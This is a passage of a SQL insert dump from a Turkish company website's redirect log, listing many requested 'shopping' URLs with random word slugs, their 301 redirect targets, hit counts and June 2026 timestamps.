00:00:00',301),(72722,'https://3s-technologies.com.tr/tr/shopping/upupa/3647202369.html',NULL,'https://3s-technologies.com.tr/shopping/upupa/3647202369.html','',1,0,'2026-06-11 04:56:48','0000-00-00 00:00:00',301),(72723,'https://3s-technologies.com.tr/tr/shopping/crossfile/3795424500.html',NULL,'https://3s-technologies.com.tr/shopping/crossfile/3795424500.html','',1,0,'2026-06-11 04:56:51','0000-00-00 00:00:00',301),(72724,'https://3s-technologies.com.tr/tr/shopping/disaffectedly/1094982164.html',NULL,'https://3s-technologies.com.tr/shopping/disaffectedly/1094982164.html','',1,0,'2026-06-11 04:56:54','0000-00-00 00:00:00',301),(72725,'https://3s-technologies.com.tr/tr/shopping/exclamatively/1756397406.html',NULL,'https://3s-technologies.com.tr/shopping/exclamatively/1756397406.html','',1,0,'2026-06-11 04:56:57','0000-00-00 00:00:00',301),(72726,'https://3s-technologies.com.tr/tr/shopping/personalities/2105037221.html',NULL,'https://3s-technologies.com.tr/shopping/personalities/2105037221.html','',1,0,'2026-06-11 04:57:00','0000-00-00 00:00:00',301),(72727,'https://3s-technologies.com.tr/tr/shopping/adverb/880976881.html',NULL,'https://3s-technologies.com.tr/shopping/adverb/880976881.html','',1,0,'2026-06-11 04:57:03','0000-00-00 00:00:00',301),(72728,'https://3s-technologies.com.tr/tr/shopping/peculating/1072175589.html',NULL,'https://3s-technologies.com.tr/shopping/peculating/1072175589.html','',1,0,'2026-06-11 04:57:06','0000-00-00 00:00:00',301),(72729,'https://3s-technologies.com.tr/tr/shopping/oversight/4210175312.html',NULL,'https://3s-technologies.com.tr/shopping/oversight/4210175312.html','',1,0,'2026-06-11 04:57:09','0000-00-00 00:00:00',301),(72730,'https://3s-technologies.com.tr/tr/shopping/poundkeeper/3770892937.html',NULL,'https://3s-technologies.com.tr/shopping/poundkeeper/3770892937.html','',1,0,'2026-06-11 04:57:12','0000-00-00 00:00:00',301),(72731,'https://3s-technologies.com.tr/tr/shopping/toppingly/2583710536.html',NULL,'https://3s-technologies.com.tr/shopping/toppingly/2583710536.html','',1,0,'2026-06-11 04:57:20','0000-00-00 00:00:00',301),(72732,'https://3s-technologies.com.tr/tr/shopping/relicly/958853127.html',NULL,'https://3s-technologies.com.tr/shopping/relicly/958853127.html','',1,0,'2026-06-11 04:57:22','0000-00-00 00:00:00',301),(72733,'https://3s-technologies.com.tr/tr/shopping/farinalis/3502824376.html',NULL,'https://3s-technologies.com.tr/shopping/farinalis/3502824376.html','',1,0,'2026-06-11 04:57:25','0000-00-00 00:00:00',301),(72734,'https://3s-technologies.com.tr/tr/shopping/coletit/536062338.html',NULL,'https://3s-technologies.com.tr/shopping/coletit/536062338.html','',1,0,'2026-06-11 04:57:28','0000-00-00 00:00:00',301),(72735,'https://3s-technologies.com.tr/tr/shopping/poetize/392896460.html',NULL,'https://3s-technologies.com.tr/shopping/poetize/392896460.html','',1,0,'2026-06-11 04:57:31','0000-00-00 00:00:00',301),(72736,'https://3s-technologies.com.tr/tr/shopping/marathon/1493081140.html',NULL,'https://3s-technologies.com.tr/shopping/marathon/1493081140.html','',1,0,'2026-06-11 04:57:34','0000-00-00 00:00:00',301),(72737,'https://3s-technologies.com.tr/tr/shopping/cupboard/486653870.html',NULL,'https://3s-technologies.com.tr/shopping/cupboard/486653870.html','',1,0,'2026-06-11 04:57:37','0000-00-00 00:00:00',301),(72738,'https://3s-technologies.com.tr/tr/shopping/billyo/2193395234.html',NULL,'https://3s-technologies.com.tr/shopping/billyo/2193395234.html','',1,0,'2026-06-11 04:57:40','0000-00-00 00:00:00',301),(72739,'https://3s-technologies.com.tr/tr/shopping/restorative/124688215.html',NULL,'https://3s-technologies.com.tr/shopping/restorative/124688215.html','',1,0,'2026-06-11 04:57:43','0000-00-00 00:00:00',301),(72740,'https://3s-technologies.com.tr/tr/shopping/philomathematic/4234281529.html',NULL,'https://3s-technologies.com.tr/shopping/philomathematic/4234281529.html','',1,0,'2026-06-11 04:57:46','0000-00-00 00:00:00',301),(72741,'https://3s-technologies.com.tr/tr/shopping/pried/2754990340.html',NULL,'https://3s-technologies.com.tr/shopping/pried/2754990340.html','',1,0,'2026-06-11 04:57:49','0000-00-00 00:00:00',301),(72742,'https://3s-technologies.com.tr/tr/shopping/antonym/3235828246.html',NULL,'https://3s-technologies.com.tr/shopping/antonym/3235828246.html','',1,0,'2026-06-11 04:57:52','0000-00-00 00:00:00',301),(72743,'https://3s-technologies.com.tr/tr/shopping/formedon/3326601932.html',NULL,'https://3s-technologies.com.tr/shopping/formedon/3326601932.html','',1,0,'2026-06-11 04:57:55','0000-00-00 00:00:00',301),(72744,'https://3s-technologies.com.tr/tr/shopping/dilucid/4274089290.html',NULL,'https://3s-technologies.com.tr/shopping/dilucid/4274089290.html','',1,0,'2026-06-11 04:57:58','0000-00-00 00:00:00',301),(72745,'https://3s-technologies.com.tr/tr/shopping/invendibility/4226759694.html',NULL,'https://3s-technologies.com.tr/shopping/invendibility/4226759694.html','',1,0,'2026-06-11 04:58:01','0000-00-00 00:00:00',301),(72746,'https://3s-technologies.com.tr/tr/shopping/fending/2043518130.html',NULL,'https://3s-technologies.com.tr/shopping/fending/2043518130.html','',1,0,'2026-06-11 04:58:04','0000-00-00 00:00:00',301),(72747,'https://3s-technologies.com.tr/tr/shopping/dialytic/2125932487.html',NULL,'https://3s-technologies.com.tr/shopping/dialytic/2125932487.html','',1,0,'2026-06-11 04:58:07','0000-00-00 00:00:00',301),(72748,'https://3s-technologies.com.tr/tr/shopping/recitation/201352378.html',NULL,'https://3s-technologies.com.tr/shopping/recitation/201352378.html','',1,0,'2026-06-11 04:58:10','0000-00-00 00:00:00',301),(72749,'https://3s-technologies.com.tr/tr/shopping/manacled/3598446442.html',NULL,'https://3s-technologies.com.tr/shopping/manacled/3598446442.html','',1,0,'2026-06-11 04:58:13','0000-00-00 00:00:00',301),(72750,'https://3s-technologies.com.tr/tr/shopping/herding/2259896933.html',NULL,'https://3s-technologies.com.tr/shopping/herding/2259896933.html','',1,0,'2026-06-11 04:58:16','0000-00-00 00:00:00',301),(72751,'https://3s-technologies.com.tr/tr/shopping/expands/3256723512.html',NULL,'https://3s-technologies.com.tr/shopping/expands/3256723512.html','',1,0,'2026-06-11 04:58:19','0000-00-00 00:00:00',301),(72752,'https://3s-technologies.com.tr/tr/shopping/precollection/2097860712.html',NULL,'https://3s-technologies.com.tr/shopping/precollection/2097860712.html','',1,0,'2026-06-11 04:58:22','0000-00-00 00:00:00',301),(72753,'https://3s-technologies.com.tr/tr/shopping/noncausal/1779620785.html',NULL,'https://3s-technologies.com.tr/shopping/noncausal/1779620785.html','',1,0,'2026-06-11 04:58:25','0000-00-00 00:00:00',301),(72754,'https://3s-technologies.com.tr/tr/shopping/verbosities/863883634.html',NULL,'https://3s-technologies.com.tr/shopping/verbosities/863883634.html','',1,0,'2026-06-11 04:58:28','0000-00-00 00:00:00',301),(72755,'https://3s-technologies.com.tr/tr/shopping/insalubrity/493666840.html',NULL,'https://3s-technologies.com.tr/shopping/insalubrity/493666840.html','',1,0,'2026-06-11 04:58:33','0000-00-00 00:00:00',301),(72756,'https://3s-technologies.com.tr/tr/shopping/seigniorage/980960508.html',NULL,'https://3s-technologies.com.tr/shopping/seigniorage/980960508.html','',1,0,'2026-06-11 04:58:36','0000-00-00 00:00:00',301),(72757,'https://3s-technologies.com.tr/tr/shopping/derworth/999873003.html',NULL,'https://3s-technologies.com.tr/shopping/derworth/999873003.html','',1,0,'2026-06-11 04:58:39','0000-00-00 00:00:00',301),(72758,'https://3s-technologies.com.tr/tr/shopping/arenga/708163475.html',NULL,'https://3s-technologies.com.tr/shopping/arenga/708163475.html','',1,0,'2026-06-11 04:58:42','0000-00-00 00:00:00',301),(72759,'https://3s-technologies.com.tr/tr/shopping/enterocoele/1258879785.html',NULL,'https://3s-technologies.com.tr/shopping/enterocoele/1258879785.html','',1,0,'2026-06-11 04:58:45','0000-00-00 00:00:00',301),(72760,'https://3s-technologies.com.tr/tr/shopping/sarabaite/4061208531.html',NULL,'https://3s-technologies.com.tr/shopping/sarabaite/4061208531.html','',1,0,'2026-06-11 04:58:48','0000-00-00 00:00:00',301),(72761,'https://3s-technologies.com.tr/tr/shopping/minniebush/956428945.html',NULL,'https://3s-technologies.com.tr/shopping/minniebush/956428945.html','',1,0,'2026-06-11 04:58:51','0000-00-00 00:00:00',301),(72762,'https://3s-technologies.com.tr/tr/shopping/snobocracy/2663931024.html',NULL,'https://3s-technologies.com.tr/shopping/snobocracy/2663931024.html','',1,0,'2026-06-11 04:58:54','0000-00-00 00:00:00',301),(72763,'https://3s-technologies.com.tr/tr/shopping/feudalism/2115379289.html',NULL,'https://3s-technologies.com.tr/shopping/feudalism/2115379289.html','',1,0,'2026-06-11 04:58:57','0000-00-00 00:00:00',301),(72764,'https://3s-technologies.com.tr/tr/shopping/hircic/3388335223.html',NULL,'https://3s-technologies.com.tr/shopping/hircic/3388335223.html','',1,0,'2026-06-11 04:59:00','0000-00-00 00:00:00',301),(72765,'https://3s-technologies.com.tr/tr/shopping/circumnavigating/2361619836.html',NULL,'https://3s-technologies.com.tr/shopping/circumnavigating/2361619836.html','',1,0,'2026-06-11 04:59:03','0000-00-00 00:00:00',301),(72766,'https://3s-technologies.com.tr/tr/shopping/relic/3356281825.html',NULL,'https://3s-technologies.com.tr/shopping/relic/3356281825.html','',1,0,'2026-06-11 04:59:06','0000-00-00 00:00:00',301),(72767,'https://3s-technologies.com.tr/tr/shopping/freshman/468348524.html',NULL,'https://3s-technologies.com.tr/shopping/freshman/468348524.html','',1,0,'2026-06-11 04:59:09','0000-00-00 00:00:00',301),(72768,'https://3s-technologies.com.tr/tr/shopping/heterocercal/714916853.html',NULL,'https://3s-technologies.com.tr/shopping/heterocercal/714916853.html','',1,0,'2026-06-11 04:59:13','0000-00-00 00:00:00',301),(72769,'https://3s-technologies.com.tr/tr/shopping/intactible/3279435827.html',NULL,'https://3s-technologies.com.tr/shopping/intactible/3279435827.html','',1,0,'2026-06-11 04:59:15','0000-00-00 00:00:00',301),(72770,'https://3s-technologies.com.tr/tr/shopping/infoliate/2688488641.html',NULL,'https://3s-technologies.com.tr/shopping/infoliate/2688488641.html','',1,0,'2026-06-11 04:59:18','0000-00-00 00:00:00',301),(72771,'https://3s-technologies.com.tr/tr/shopping/depulsory/1115877430.html',NULL,'https://3s-technologies.com.tr/shopping/depulsory/1115877430.html','',1,0,'2026-06-11 04:59:22','0000-00-00 00:00:00',301),(72772,'https://3s-technologies.com.tr/tr/shopping/lonestar/2031522520.html',NULL,'https://3s-technologies.com.tr/shopping/lonestar/2031522520.html','',1,0,'2026-06-11 04:59:25','0000-00-00 00:00:00',301),(72773,'https://3s-technologies.com.tr/tr/shopping/ottomite/1406634451.html',NULL,'https://3s-technologies.com.tr/shopping/ottomite/1406634451.html','',1,0,'2026-06-11 04:59:27','0000-00-00 00:00:00',301),(72774,'https://3s-technologies.com.tr/tr/shopping/suasory/2598804915.html',NULL,'https://3s-technologies.com.tr/shopping/suasory/2598804915.html','',1,0,'2026-06-11 04:59:30','0000-00-00 00:00:00',301),(72775,'https://3s-technologies.com.tr/tr/shopping/wispen/3140882608.html',NULL,'https://3s-technologies.com.tr/shopping/wispen/3140882608.html','',1,0,'2026-06-11 04:59:33','0000-00-00 00:00:00',301),(72776,'https://3s-technologies.com.tr/tr/shopping/racemed/4115992572.html',NULL,'https://3s-technologies.com.tr/shopping/racemed/4115992572.html','',1,0,'2026-06-11 04:59:37','0000-00-00 00:00:00',301),(72777,'https://3s-technologies.com.tr/tr/shopping/thecaphora/2482940156.html',NULL,'https://3s-technologies.com.tr/shopping/thecaphora/2482940156.html','',1,0,'2026-06-11 04:59:39','0000-00-00 00:00:00',301),(72778,'https://3s-technologies.com.tr/tr/shopping/chromate/3864090805.html',NULL,'https://3s-technologies.com.tr/shopping/chromate/3864090805.html','',1,0,'2026-06-11 04:59:42','0000-00-00 00:00:00',301),(72779,'https://3s-technologies.com.tr/tr/shopping/hockday/2023393536.html',NULL,'https://3s-technologies.com.tr/shopping/hockday/2023393536.html','',1,0,'2026-06-11 04:59:45','0000-00-00 00:00:00',301),(72780,'https://3s-technologies.com.tr/tr/shopping/respectant/4088509650.html',NULL,'https://3s-technologies.com.tr/shopping/respectant/4088509650.html','',1,0,'2026-06-11 04:59:48','0000-00-00 00:00:00',301),(72781,'https://3s-technologies.com.tr/tr/shopping/nomansland/1687862227.html',NULL,'https://3s-technologies.com.tr/shopping/nomansland/1687862227.html','',1,0,'2026-06-11 04:59:52','0000-00-00 00:00:00',301),(72782,'https://3s-technologies.com.tr/tr/shopping/midrashim/4202998787.html',NULL,'https://3s-technologies.com.tr/shopping/midrashim/4202998787.html','',1,0,'2026-06-11 04:59:54','0000-00-00 00:00:00',301),(72783,'https://3s-technologies.com.tr/tr/shopping/leadsmen/4206635100.html',NULL,'https://3s-technologies.com.tr/shopping/leadsmen/4206635100.html','',1,0,'2026-06-11 04:59:57','0000-00-00 00:00:00',301),(72784,'https://3s-technologies.com.tr/tr/shopping/pomatum/1762102208.html',NULL,'https://3s-technologies.com.tr/shopping/pomatum/1762102208.html','',1,0,'2026-06-11 05:00:01','0000-00-00 00:00:00',301),(72785,'https://3s-technologies.com.tr/tr/shopping/volitient/1724293299.html',NULL,'https://3s-technologies.com.tr/shopping/volitient/1724293299.html','',1,0,'2026-06-11 05:00:03','0000-00-00 00:00:00',301),(72786,'https://3s-technologies.com.tr/tr/shopping/tighten/3174329924.html',NULL,'https://3s-technologies.com.tr/shopping/tighten/3174329924.html','',1,0,'2026-06-11 05:00:06','0000-00-00 00:00:00',301),(72787,'https://3s-technologies.com.tr/tr/shopping/approbation/3414213097.html',NULL,'https://3s-technologies.com.tr/shopping/approbation/3414213097.html','',1,0,'2026-06-11 05:00:09','0000-00-00 00:00:00',301),(72788,'https://3s-technologies.com.tr/tr/shopping/disrout/2188806446.html',NULL,'https://3s-technologies.com.tr/shopping/disrout/2188806446.html','',1,0,'2026-06-11 05:00:13','0000-00-00 00:00:00',301),(72789,'https://3s-technologies.com.tr/tr/shopping/aposematic/3467439697.html',NULL,'https://3s-technologies.com.tr/shopping/aposematic/3467439697.html','',1,0,'2026-06-11 05:00:15','0000-00-00 00:00:00',301),(72790,'https://3s-technologies.com.tr/tr/shopping/spheroidal/1221236614.html',NULL,'https://3s-technologies.com.tr/shopping/spheroidal/1221236614.html','',1,0,'2026-06-11 05:00:19','0000-00-00 00:00:00',301),(72791,'https://3s-technologies.com.tr/tr/shopping/reinfund/533474601.html',NULL,'https://3s-technologies.com.tr/shopping/reinfund/533474601.html','',1,0,'2026-06-11 05:00:21','0000-00-00 00:00:00',301),(72792,'https://3s-technologies.com.tr/tr/shopping/rationalistically/1825063711.html',NULL,'https://3s-technologies.com.tr/shopping/rationalistically/1825063711.html','',1,0,'2026-06-11 05:00:25','0000-00-00 00:00:00',301),(72793,'https://3s-technologies.com.tr/tr/shopping/anthophagous/462547621.html',NULL,'https://3s-technologies.com.tr/shopping/anthophagous/462547621.html','',1,0,'2026-06-11 05:00:28','0000-00-00 00:00:00',301),(72794,'https://3s-technologies.com.tr/tr/shopping/trilithon/2246967144.html',NULL,'https://3s-technologies.com.tr/shopping/trilithon/2246967144.html','',1,0,'2026-06-11 05:00:34','0000-00-00 00:00:00',301),(72795,'https://3s-technologies.com.tr/tr/shopping/bouvines/1113549317.html',NULL,'https://3s-technologies.com.tr/shopping/bouvines/1113549317.html','',1,0,'2026-06-11 05:00:37','0000-00-00 00:00:00',301),(72796,'https://3s-technologies.com.tr/tr/shopping/sharpsightedness/1605191519.html',NULL,'https://3s-technologies.com.tr/shopping/sharpsightedness/1605191519.html','',1,0,'2026-06-11 05:00:39','0000-00-00 00:00:00',301),(72797,'https://3s-technologies.com.tr/tr/images/s1781154037.php',NULL,'','',9,0,'2026-06-11 05:00:41','0000-00-00 00:00:00',301),(72798,'https://3s-technologies.com.tr/tr/shopping/reinthronize/3042111064.html',NULL,'https://3s-technologies.com.tr/shopping/reinthronize/3042111064.html','',1,0,'2026-06-11 05:00:43','0000-00-00 00:00:00',301),(72799,'https://3s-technologies.com.tr/tr/shopping/orthodromics/2901532923.html',NULL,'https://3s-technologies.com.tr/shopping/orthodromics/2901532923.html','',1,0,'2026-06-11 05:00:46','0000-00-00 00:00:00',301),(72800,'https://3s-technologies.com.tr/tr/shopping/tillefally/2025817718.html',NULL,'https://3s-technologies.com.tr/shopping/tillefally/2025817718.html','',1,0,'2026-06-11 05:00:48','0000-00-00 00:00:00',301),(72801,'https://3s-technologies.com.tr/tr/shopping/ostracoin/811098477.html',NULL,'https://3s-technologies.com.tr/shopping/ostracoin/811098477.html','',1,0,'2026-06-11 05:00:51','0000-00-00 00:00:00',301),(72802,'https://3s-technologies.com.tr/tr/shopping/isidorian/3429796526.html',NULL,'https://3s-technologies.com.tr/shopping/isidorian/3429796526.html','',1,0,'2026-06-11 05:00:54','0000-00-00 00:00:00',301),(72803,'https://3s-technologies.com.tr/tr/shopping/ruffian/2823265895.html',NULL,'https://3s-technologies.com.tr/shopping/ruffian/2823265895.html','',1,0,'2026-06-11 05:00:58','0000-00-00 00:00:00',301),(72804,'https://3s-technologies.com.tr/tr/shopping/chokeberry/3091474140.html',NULL,'https://3s-technologies.com.tr/shopping/chokeberry/3091474140.html','',1,0,'2026-06-11 05:01:01','0000-00-00 00:00:00',301),(72805,'https://3s-technologies.com.tr/tr/shopping/electrotelegraphic/3063006330.html',NULL,'https://3s-technologies.com.tr/shopping/electrotelegraphic/3063006330.html','',1,0,'2026-06-11 05:01:05','0000-00-00 00:00:00',301),(72806,'https://3s-technologies.com.tr/tr/shopping/sylvestrix/2577909665.html',NULL,'https://3s-technologies.com.tr/shopping/sylvestrix/2577909665.html','',1,0,'2026-06-11 05:01:10','0000-00-00 00:00:00',301),(72807,'https://3s-technologies.com.tr/tr/shopping/tolype/394108559.html',NULL,'https://3s-technologies.com.tr/shopping/tolype/394108559.html','',1,0,'2026-06-11 05:01:13','0000-00-00 00:00:00',301),(72808,'https://3s-technologies.com.tr/tr/shopping/spinthariscopic/3546431957.html',NULL,'https://3s-technologies.com.tr/shopping/spinthariscopic/3546431957.html','',1,0,'2026-06-11 05:01:15','0000-00-00 00:00:00',301),(72809,'https://3s-technologies.com.tr/tr/shopping/munjista/1105535378.html',NULL,'https://3s-technologies.com.tr/shopping/munjista/1105535378.html','',1,0,'2026-06-11 05:01:18','0000-00-00 00:00:00',301),(72810,'https://3s-technologies.com.tr/tr/shopping/gastful/570191335.html',NULL,'https://3s-technologies.com.tr/shopping/gastful/570191335.html','',1,0,'2026-06-11 05:01:21','0000-00-00 00:00:00',301),(72811,'https://3s-technologies.com.tr/tr/shopping/sempster/3643662157.html',NULL,'https://3s-technologies.com.tr/shopping/sempster/3643662157.html','',1,0,'2026-06-11 05:01:25','0000-00-00 00:00:00',301),(72812,'https://3s-technologies.com.tr/tr/shopping/expeditionist/3422438182.html',NULL,'https://3s-technologies.com.tr/shopping/expeditionist/3422438182.html','',1,0,'2026-06-11 05:01:28','0000-00-00 00:00:00',301),(72813,'https://3s-technologies.com.tr/tr/shopping/heliographic/1385297774.html',NULL,'https://3s-technologies.com.tr/shopping/heliographic/1385297774.html','',1,0,'2026-06-11 05:01:31','0000-00-00 00:00:00',301),(72814,'https://3s-technologies.com.tr/tr/shopping/myobia/2600017014.html',NULL,'https://3s-technologies.com.tr/shopping/myobia/2600017014.html','',1,0,'2026-06-11 05:01:33','0000-00-00 00:00:00',301),(72815,'https://3s-technologies.com.tr/tr/shopping/stellerida/1484856055.html',NULL,'https://3s-technologies.com.tr/shopping/stellerida/1484856055.html','',1,0,'2026-06-11 05:01:36','0000-00-00 00:00:00',301),(72816,'https://3s-technologies.com.tr/tr/shopping/ptarmigan/706951392.html',NULL,'https://3s-technologies.com.tr/shopping/ptarmigan/706951392.html','',1,0,'2026-06-11 05:01:40','0000-00-00 00:00:00',301),(72817,'https://3s-technologies.com.tr/tr/shopping/vesiculosus/2712153431.html',NULL,'https://3s-technologies.com.tr/shopping/vesiculosus/2712153431.html','',1,0,'2026-06-11 05:01:48','0000-00-00 00:00:00',301),(72818,'https://3s-technologies.com.tr/tr/shopping/imitatress/2966268250.html',NULL,'https://3s-technologies.com.tr/shopping/imitatress/2966268250.html','',1,0,'2026-06-11 05:01:50','0000-00-00 00:00:00',301),(72819,'https://3s-technologies.com.tr/tr/shopping/jealoushood/2236413946.html',NULL,'https://3s-technologies.com.tr/shopping/jealoushood/2236413946.html','',1,0,'2026-06-11 05:01:52','0000-00-00 00:00:00',301),(72820,'https://3s-technologies.com.tr/tr/shopping/impetiginous/2328172488.html',NULL,'https://3s-technologies.com.tr/shopping/impetiginous/2328172488.html','',1,0,'2026-06-11 05:01:55','0000-00-00 00:00:00',301),(72821,'https://3s-technologies.com.tr/tr/shopping/synallaxine/2165323443.html',NULL,'https://3s-technologies.com.tr/shopping/synallaxine/2165323443.html','',1,0,'2026-06-11 05:01:58','0000-00-00 00:00:00',301),(72822,'https://3s-technologies.com.tr/tr/shopping/aeronautics/995120676.html',NULL,'https://3s-technologies.com.tr/shopping/aeronautics/995120676.html','',1,0,'2026-06-11 05:02:01','0000-00-00 00:00:00',301),(72823,'https://3s-technologies.com.tr/tr/shopping/megalethoscope/1037909107.html',NULL,'https://3s-technologies.com.tr/shopping/megalethoscope/1037909107.html','',1,0,'2026-06-11 05:02:04','0000-00-00 00:00:00',301),(72824,'https://3s-technologies.com.tr/tr/shopping/chattiness/3616146838.html',NULL,'https://3s-technologies.com.tr/shopping/chattiness/3616146838.html','',1,0,'2026-06-11 05:02:07','0000-00-00 00:00:00',301),(72825,'https://3s-technologies.com.tr/tr/shopping/presuppose/422739860.html',NULL,'https://3s-technologies.com.tr/shopping/presuppose/422739860.html','',1,0,'2026-06-11 05:02:10','0000-00-00 00:00:00',301),(72826,'https://3s-technologies.com.tr/tr/shopping/newmarket/3237203884.html',NULL,'https://3s-technologies.com.tr/shopping/newmarket/3237203884.html','',1,0,'2026-06-11 05:02:13','0000-00-00 00:00:00',301),(72827,'https://3s-technologies.com.tr/tr/shopping/mastress/3859338510.html',NULL,'https://3s-technologies.com.tr/shopping/mastress/3859338510.html','',1,0,'2026-06-11 05:02:16','0000-00-00 00:00:00',301),(72828,'https://3s-technologies.com.tr/tr/shopping/lophine/1371415478.html',NULL,'https://3s-technologies.com.tr/shopping/lophine/1371415478.html','',1,0,'2026-06-11 05:02:19','0000-00-00 00:00:00',301),(72829,'https://3s-technologies.com.tr/tr/shopping/medalet/3275799530.html',NULL,'https://3s-technologies.com.tr/shopping/medalet/3275799530.html','',1,0,'2026-06-11 05:02:22','0000-00-00 00:00:00',301),(72830,'https://3s-technologies.com.tr/tr/shopping/cholecalciferol/2553032744.html',NULL,'https://3s-technologies.com.tr/shopping/cholecalciferol/2553032744.html','',1,0,'2026-06-11 05:02:25','0000-00-00 00:00:00',301),(72831,'https://3s-technologies.com.tr/tr/shopping/otosteal/1923835223.html',NULL,'https://3s-technologies.com.tr/shopping/otosteal/1923835223.html','',1,0,'2026-06-11 05:02:28','0000-00-00 00:00:00',301),(72832,'https://3s-technologies.com.tr/tr/shopping/glassgazing/150991435.html',NULL,'https://3s-technologies.com.tr/shopping/glassgazing/150991435.html','',1,0,'2026-06-11 05:02:31','0000-00-00 00:00:00',301),(72833,'https://3s-technologies.com.tr/tr/shopping/lunary/552231331.html',NULL,'https://3s-technologies.com.tr/shopping/lunary/552231331.html','',1,0,'2026-06-11 05:02:34','0000-00-00 00:00:00',301),(72834,'https://3s-technologies.com.tr/tr/shopping/jungermanniaceae/421364254.html',NULL,'https://3s-technologies.com.tr/shopping/jungermanniaceae/421364254.html','',1,0,'2026-06-11 05:02:37','0000-00-00 00:00:00',301),(72835,'https://3s-technologies.com.tr/tr/shopping/neocriticism/1660379305.html',NULL,'https://3s-technologies.com.tr/shopping/neocriticism/1660379305.html','',1,0,'2026-06-11 05:02:40','0000-00-00 00:00:00',301),(72836,'https://3s-technologies.com.tr/tr/shopping/blackburnian/2927016977.html',NULL,'https://3s-technologies.com.tr/shopping/blackburnian/2927016977.html','',1,0,'2026-06-11 05:02:43','0000-00-00 00:00:00',301),(72837,'https://3s-technologies.com.tr/tr/shopping/meninx/4215210446.html',NULL,'https://3s-technologies.com.tr/shopping/meninx/4215210446.html','',1,0,'2026-06-11 05:02:49','0000-00-00 00:00:00',301),(72838,'https://3s-technologies.com.tr/tr/shopping/queensize/3862853079.html',NULL,'https://3s-technologies.com.tr/shopping/queensize/3862853079.html','',1,0,'2026-06-11 05:02:51','0000-00-00 00:00:00',301),(72839,'https://3s-technologies.com.tr/tr/shopping/compel/4255496526.html',NULL,'https://3s-technologies.com.tr/shopping/compel/4255496526.html','',1,0,'2026-06-11 05:02:54','0000-00-00 00:00:00',301),(72840,'https://3s-technologies.com.tr/tr/shopping/backcast/339989575.html',NULL,'https://3s-technologies.com.tr/shopping/backcast/339989575.html','',1,0,'2026-06-11 05:02:57','0000-00-00 00:00:00',301),(72841,'https://3s-technologies.com.tr/tr/shopping/microglossus/2626166141.html',NULL,'https://3s-technologies.com.tr/shopping/microglossus/2626166141.html','',1,0,'2026-06-11 05:03:00','0000-00-00 00:00:00',301),(72842,'https://3s-technologies.com.tr/tr/shopping/juvenility/3816639481.html',NULL,'https://3s-technologies.com.tr/shopping/juvenility/3816639481.html','',1,0,'2026-06-11 05:03:03','0000-00-00 00:00:00',301),(72843,'https://3s-technologies.com.tr/tr/shopping/interstice/3278102032.html',NULL,'https://3s-technologies.com.tr/shopping/interstice/3278102032.html','',1,0,'2026-06-11 05:03:06','0000-00-00 00:00:00',301),(72844,'https://3s-technologies.com.tr/tr/shopping/sentry/2357957896.html',NULL,'https://3s-technologies.com.tr/shopping/sentry/2357957896.html','',1,0,'2026-06-11 05:03:09','0000-00-00 00:00:00',301),(72845,'https://3s-technologies.com.tr/tr/shopping/educator/808812175.html',NULL,'https://3s-technologies.com.tr/shopping/educator/808812175.html','',1,0,'2026-06-11 05:03:12','0000-00-00 00:00:00',301),(72846,'https://3s-technologies.com.tr/tr/shopping/protuberant/4256708625.html',NULL,'https://3s-technologies.com.tr/shopping/protuberant/4256708625.html','',1,0,'2026-06-11 05:03:15','0000-00-00 00:00:00',301),(72847,'https://3s-technologies.com.tr/tr/shopping/synizesis/849832019.html',NULL,'https://3s-technologies.com.tr/shopping/synizesis/849832019.html','',1,0,'2026-06-11 05:03:18','0000-00-00 00:00:00',301),(72848,'https://3s-technologies.com.tr/tr/shopping/deodorize/1410330855.html',NULL,'https://3s-technologies.com.tr/shopping/deodorize/1410330855.html','',1,0,'2026-06-11 05:03:21','0000-00-00 00:00:00',301),(72849,'https://3s-technologies.com.tr/tr/shopping/pluviameter/534565004.html',NULL,'https://3s-technologies.com.tr/shopping/pluviameter/534565004.html','',1,0,'2026-06-11 05:03:24','0000-00-00 00:00:00',301),(72850,'https://3s-technologies.com.tr/tr/shopping/mortification/785885660.html',NULL,'https://3s-technologies.com.tr/shopping/mortification/785885660.html','',1,0,'2026-06-11 05:03:27','0000-00-00 00:00:00',301),(72851,'https://3s-technologies.com.tr/tr/shopping/canoemen/3925538893.html',NULL,'https://3s-technologies.com.tr/shopping/canoemen/3925538893.html','',1,0,'2026-06-11 05:03:30','0000-00-00 00:00:00',301),(72852,'https://3s-technologies.com.tr/tr/shopping/offroad/3495785763.html',NULL,'https://3s-technologies.com.tr/shopping/offroad/3495785763.html','',1,0,'2026-06-11 05:03:33','0000-00-00 00:00:00',301),(72853,'https://3s-technologies.com.tr/tr/shopping/recreating/2160612959.html',NULL,'https://3s-technologies.com.tr/shopping/recreating/2160612959.html','',1,0,'2026-06-11 05:03:36','0000-00-00 00:00:00',301),(72854,'https://3s-technologies.com.tr/tr/shopping/flatbottom/4257661116.html',NULL,'https://3s-technologies.com.tr/shopping/flatbottom/4257661116.html','',1,0,'2026-06-11 05:03:42','0000-00-00 00:00:00',301),(72855,'https://3s-technologies.com.tr/tr/shopping/surfeiting/3843073827.html',NULL,'https://3s-technologies.com.tr/shopping/surfeiting/3843073827.html','',1,0,'2026-06-11 05:03:46','0000-00-00 00:00:00',301),(72856,'https://3s-technologies.com.tr/tr/shopping/sighed/3276889933.html',NULL,'https://3s-technologies.com.tr/shopping/sighed/3276889933.html','',1,0,'2026-06-11 05:03:49','0000-00-00 00:00:00',301),(72857,'https://3s-technologies.com.tr/tr/shopping/bowdlerization/3461353559.html',NULL,'https://3s-technologies.com.tr/shopping/bowdlerization/3461353559.html','',1,0,'2026-06-11 05:03:52','0000-00-00 00:00:00',301),(72858,'https://3s-technologies.com.tr/tr/shopping/superfluity/627308392.html',NULL,'https://3s-technologies.com.tr/shopping/superfluity/627308392.html','',1,0,'2026-06-11 05:03:55','0000-00-00 00:00:00',301),(72859,'https://3s-technologies.com.tr/tr/shopping/overdoer/92243701.html',NULL,'https://3s-technologies.com.tr/shopping/overdoer/92243701.html','',1,0,'2026-06-11 05:03:58','0000-00-00 00:00:00',301),(72860,'https://3s-technologies.com.tr/tr/shopping/equant/560806677.html',NULL,'https://3s-technologies.com.tr/shopping/equant/560806677.html','',1,0,'2026-06-11 05:04:01','0000-00-00 00:00:00',301),(72861,'https://3s-technologies.com.tr/tr/shopping/besides/3767231013.html',NULL,'https://3s-technologies.com.tr/shopping/besides/3767231013.html','',1,0,'2026-06-11 05:04:04','0000-00-00 00:00:00',301),(72862,'https://3s-technologies.com.tr/tr/shopping/skeletonize/2177439001.html',NULL,'https://3s-technologies.com.tr/shopping/skeletonize/2177439001.html','',1,0,'2026-06-11 05:04:06','0000-00-00 